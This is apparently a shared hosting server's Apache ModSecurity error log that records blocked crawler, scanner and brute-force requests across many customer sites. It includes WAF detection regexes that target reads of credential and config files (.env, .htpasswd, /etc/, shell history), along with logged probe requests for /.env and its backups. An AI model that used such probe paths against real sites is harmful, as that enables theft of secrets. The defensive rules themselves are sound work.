[Tue May 26 15:03:27.156657 2026] [security2:error] [pid 678998:tid 679172] [client 185.191.171.2:21932] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-november/day/2025-02-27/"] [unique_id "ahVo55-Rl4i_pgT-iAdadwAAACw"]
[Tue May 26 15:03:27.156774 2026] [security2:error] [pid 678998:tid 679172] [client 185.191.171.2:21932] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-november/day/2025-02-27/"] [unique_id "ahVo55-Rl4i_pgT-iAdadwAAACw"]
[Tue May 26 15:03:27.618752 2026] [security2:error] [pid 678998:tid 679197] [client 136.243.220.209:46676] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVo55-Rl4i_pgT-iAdahgAAAEU"]
[Tue May 26 15:03:27.891977 2026] [security2:error] [pid 678998:tid 679178] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVo55-Rl4i_pgT-iAdahQAAADI"]
[Tue May 26 15:03:28.329436 2026] [security2:error] [pid 678998:tid 679188] [client 14.178.17.75:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVo55-Rl4i_pgT-iAdalAAAADw"]
[Tue May 26 15:03:29.552666 2026] [security2:error] [pid 678998:tid 679252] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVo6Z-Rl4i_pgT-iAdasAAAAHw"]
[Tue May 26 15:03:30.898297 2026] [security2:error] [pid 678998:tid 679203] [client 191.242.110.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.kingsclub.in"] [uri "/index.php"] [unique_id "ahVo6p-Rl4i_pgT-iAda0AAASxM"], referer: http://www.kingsclub.in/about-us
[Tue May 26 15:03:31.731257 2026] [security2:error] [pid 678998:tid 679237] [client 136.243.220.209:3338] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVo65-Rl4i_pgT-iAda_gAAAG0"]
[Tue May 26 15:03:32.257934 2026] [security2:error] [pid 678998:tid 679146] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVo65-Rl4i_pgT-iAdbBAAAABI"]
[Tue May 26 15:03:32.951642 2026] [security2:error] [pid 678998:tid 679140] [client 154.161.32.97:57096] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVo7J-Rl4i_pgT-iAdbHwAAAAw"]
[Tue May 26 15:03:32.951764 2026] [security2:error] [pid 678998:tid 679140] [client 154.161.32.97:57096] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVo7J-Rl4i_pgT-iAdbHwAAAAw"]
[Tue May 26 15:03:33.315709 2026] [core:error] [pid 678998:tid 679253] [client 107.174.194.185:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:03:33.315733 2026] [core:error] [pid 678998:tid 679253] [client 107.174.194.185:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:03:34.320676 2026] [security2:error] [pid 678998:tid 679237] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVo7Z-Rl4i_pgT-iAdbQwAAAG0"]
[Tue May 26 15:03:35.474720 2026] [security2:error] [pid 678998:tid 679211] [client 136.243.220.209:20704] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVo75-Rl4i_pgT-iAdbaQAAAFM"]
[Tue May 26 15:03:35.931307 2026] [security2:error] [pid 678998:tid 679042] [remote 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.ndequipments.com"] [uri "/.env"] [unique_id "ahVo75-Rl4i_pgT-iAdbgQAARis"]
[Tue May 26 15:03:36.087896 2026] [security2:error] [pid 678998:tid 679049] [remote 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.ndequipments.com"] [uri "/.docker/.env"] [unique_id "ahVo8J-Rl4i_pgT-iAdbiQAABzI"]
[Tue May 26 15:03:36.258573 2026] [security2:error] [pid 678998:tid 679053] [remote 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.ndequipments.com"] [uri "/.docker/laravel/app/.env"] [unique_id "ahVo8J-Rl4i_pgT-iAdbkAAAVzY"]
[Tue May 26 15:03:36.318290 2026] [security2:error] [pid 678998:tid 679204] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVo75-Rl4i_pgT-iAdbdwAAAEw"]
[Tue May 26 15:03:36.323342 2026] [security2:error] [pid 678998:tid 679057] [remote 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.ndequipments.com"] [uri "/backend/.env"] [unique_id "ahVo8J-Rl4i_pgT-iAdbkgAARTo"]
[Tue May 26 15:03:36.484047 2026] [security2:error] [pid 678998:tid 679079] [remote 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.ndequipments.com"] [uri "/.env"] [unique_id "ahVo8J-Rl4i_pgT-iAdboAAAc1A"]
[Tue May 26 15:03:36.528255 2026] [security2:error] [pid 678998:tid 679060] [remote 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(\\\\/\\\\*\\\\!? ?(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe|union|concat|group_concat))" at REQUEST_FILENAME. [file "/opt/mod_security/hg_rules.conf"] [line "1019"] [id "9000042"] [rev "2.2.2"] [msg "SQL Comment Sequence Detected."] [data "/*update"] [hostname "www.ndequipments.com"] [uri "/*update.cgi*"] [unique_id "ahVo8J-Rl4i_pgT-iAdboQAAST0"]
[Tue May 26 15:03:37.620368 2026] [security2:error] [pid 678998:tid 679070] [remote 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.ndequipments.com"] [uri "/.env.bak"] [unique_id "ahVo8Z-Rl4i_pgT-iAdbtwAAfEc"]
[Tue May 26 15:03:37.622593 2026] [security2:error] [pid 678998:tid 679072] [remote 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.ndequipments.com"] [uri "/.env.backup"] [unique_id "ahVo8Z-Rl4i_pgT-iAdbuQAAJUk"]
[Tue May 26 15:03:37.967237 2026] [security2:error] [pid 678998:tid 679164] [client 154.161.32.97:57097] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVo8Z-Rl4i_pgT-iAdbxQAAACQ"]
[Tue May 26 15:03:37.974754 2026] [security2:error] [pid 678998:tid 679164] [client 154.161.32.97:57097] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVo8Z-Rl4i_pgT-iAdbxQAAACQ"]
[Tue May 26 15:03:38.084855 2026] [security2:error] [pid 678998:tid 679163] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.ndequipments.com"] [uri "/index.php"] [unique_id "ahVo8J-Rl4i_pgT-iAdbmAAAIzs"]
[Tue May 26 15:03:38.085177 2026] [security2:error] [pid 678998:tid 679149] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.ndequipments.com"] [uri "/index.php"] [unique_id "ahVo8Z-Rl4i_pgT-iAdbtgAAFUY"]
[Tue May 26 15:03:38.085336 2026] [security2:error] [pid 678998:tid 679039] [remote 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.ndequipments.com"] [uri "/index.php"] [unique_id "ahVo75-Rl4i_pgT-iAdbfwAAIyg"]
[Tue May 26 15:03:38.086769 2026] [security2:error] [pid 678998:tid 679054] [remote 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.ndequipments.com"] [uri "/index.php"] [unique_id "ahVo75-Rl4i_pgT-iAdbgwAATzc"]
[Tue May 26 15:03:38.086812 2026] [security2:error] [pid 678998:tid 679045] [remote 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.ndequipments.com"] [uri "/index.php"] [unique_id "ahVo75-Rl4i_pgT-iAdbfQAAfC4"]
[Tue May 26 15:03:38.086899 2026] [security2:error] [pid 678998:tid 679050] [remote 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.ndequipments.com"] [uri "/index.php"] [unique_id "ahVo8J-Rl4i_pgT-iAdbiAAAfDM"]
[Tue May 26 15:03:38.087299 2026] [security2:error] [pid 678998:tid 679247] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.ndequipments.com"] [uri "/index.php"] [unique_id "ahVo8J-Rl4i_pgT-iAdbowAAdz8"]
[Tue May 26 15:03:38.087375 2026] [security2:error] [pid 678998:tid 679048] [remote 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.ndequipments.com"] [uri "/index.php"] [unique_id "ahVo8J-Rl4i_pgT-iAdbhgAAFTE"]
[Tue May 26 15:03:38.087410 2026] [security2:error] [pid 678998:tid 679163] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.ndequipments.com"] [uri "/index.php"] [unique_id "ahVo8J-Rl4i_pgT-iAdbkQAAIzk"]
[Tue May 26 15:03:38.087498 2026] [security2:error] [pid 678998:tid 679043] [remote 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.ndequipments.com"] [uri "/index.php"] [unique_id "ahVo75-Rl4i_pgT-iAdbggAAdyw"]
[Tue May 26 15:03:38.088147 2026] [security2:error] [pid 678998:tid 679144] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.ndequipments.com"] [uri "/index.php"] [unique_id "ahVo8Z-Rl4i_pgT-iAdbuAAAEEg"]
[Tue May 26 15:03:38.088838 2026] [security2:error] [pid 678998:tid 679162] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.ndequipments.com"] [uri "/index.php"] [unique_id "ahVo8J-Rl4i_pgT-iAdbogAAIj4"]
[Tue May 26 15:03:38.093590 2026] [security2:error] [pid 678998:tid 679055] [remote 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.ndequipments.com"] [uri "/index.php"] [unique_id "ahVo75-Rl4i_pgT-iAdbhAAAOTg"]
[Tue May 26 15:03:38.094092 2026] [security2:error] [pid 678998:tid 679041] [remote 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.ndequipments.com"] [uri "/index.php"] [unique_id "ahVo75-Rl4i_pgT-iAdbfAAAByo"]
[Tue May 26 15:03:38.575453 2026] [security2:error] [pid 678998:tid 679047] [remote 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.ndequipments.com"] [uri "/index.php"] [unique_id "ahVo8J-Rl4i_pgT-iAdbhwAAfDA"]
[Tue May 26 15:03:38.598501 2026] [security2:error] [pid 678998:tid 679200] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVo8p-Rl4i_pgT-iAdbzwAAAEg"]
[Tue May 26 15:03:38.866427 2026] [security2:error] [pid 678998:tid 679174] [client 114.119.148.237:22261] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahVo8p-Rl4i_pgT-iAdb4AAAAC4"], referer: http://haddingtonwines.com/cart?remove_item=f291e10ec3263bd7724556d62e70e25d
[Tue May 26 15:03:39.186835 2026] [security2:error] [pid 678998:tid 679046] [remote 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.ndequipments.com"] [uri "/index.php"] [unique_id "ahVo75-Rl4i_pgT-iAdbhQAAES8"]
[Tue May 26 15:03:39.575356 2026] [security2:error] [pid 678998:tid 679195] [client 136.243.220.209:27875] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVo85-Rl4i_pgT-iAdb9wAAAEM"]
[Tue May 26 15:03:40.226595 2026] [security2:error] [pid 678998:tid 679052] [remote 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.ndequipments.com"] [uri "/index.php"] [unique_id "ahVo8J-Rl4i_pgT-iAdbjwAAEDU"]
[Tue May 26 15:03:41.423992 2026] [security2:error] [pid 678998:tid 679174] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVo9Z-Rl4i_pgT-iAdcHgAAAC4"]
[Tue May 26 15:03:43.189124 2026] [security2:error] [pid 678998:tid 679214] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVo9p-Rl4i_pgT-iAdcXQAAAFY"]
[Tue May 26 15:03:44.171824 2026] [security2:error] [pid 678998:tid 679143] [client 136.243.220.209:14717] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVo-J-Rl4i_pgT-iAdchwAAAA8"]
[Tue May 26 15:03:45.336550 2026] [security2:error] [pid 678998:tid 679198] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVo-J-Rl4i_pgT-iAdcqAAAAEY"]
[Tue May 26 15:03:47.086106 2026] [security2:error] [pid 678998:tid 679136] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVo-p-Rl4i_pgT-iAdc3AAAAAg"]
[Tue May 26 15:03:47.111072 2026] [security2:error] [pid 678998:tid 679120] [remote 74.7.241.58:53546] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVo-5-Rl4i_pgT-iAdc6AAAY3k"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/vi
[Tue May 26 15:03:47.516011 2026] [security2:error] [pid 678998:tid 679198] [client 136.243.220.209:12171] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVo-5-Rl4i_pgT-iAdc7wAAAEY"]
[Tue May 26 15:03:47.957201 2026] [security2:error] [pid 678998:tid 679228] [client 74.7.230.19:43182] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahVo-p-Rl4i_pgT-iAdc3QAAZHE"]
[Tue May 26 15:03:48.723527 2026] [autoindex:error] [pid 678998:tid 679170] [client 35.247.127.236:62800] AH01276: Cannot serve directory /home2/tips4iow/traderscafe.club/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:03:49.500464 2026] [security2:error] [pid 678998:tid 679148] [client 35.247.127.236:62800] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "traderscafe.club.jiyani.in"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahVo_Z-Rl4i_pgT-iAddNAAAABQ"]
[Tue May 26 15:03:49.700712 2026] [security2:error] [pid 678998:tid 679243] [client 35.247.127.236:63317] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "traderscafe.club.jiyani.in"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahVo_Z-Rl4i_pgT-iAddPAAAAHM"]
[Tue May 26 15:03:49.863115 2026] [security2:error] [pid 678998:tid 679226] [client 35.247.127.236:62902] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "traderscafe.jiyani.in"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahVo_Z-Rl4i_pgT-iAddRAAAAGI"]
[Tue May 26 15:03:49.891911 2026] [security2:error] [pid 678998:tid 679177] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVo_Z-Rl4i_pgT-iAddMAAAADE"]
[Tue May 26 15:03:49.894375 2026] [security2:error] [pid 678998:tid 679160] [client 35.247.127.236:63430] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "traderscafe.club.jiyani.in"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahVo_Z-Rl4i_pgT-iAddRgAAACA"]
[Tue May 26 15:03:50.096184 2026] [security2:error] [pid 678998:tid 679199] [client 35.247.127.236:63515] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "traderscafe.club.jiyani.in"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahVo_p-Rl4i_pgT-iAddSwAAAEc"]
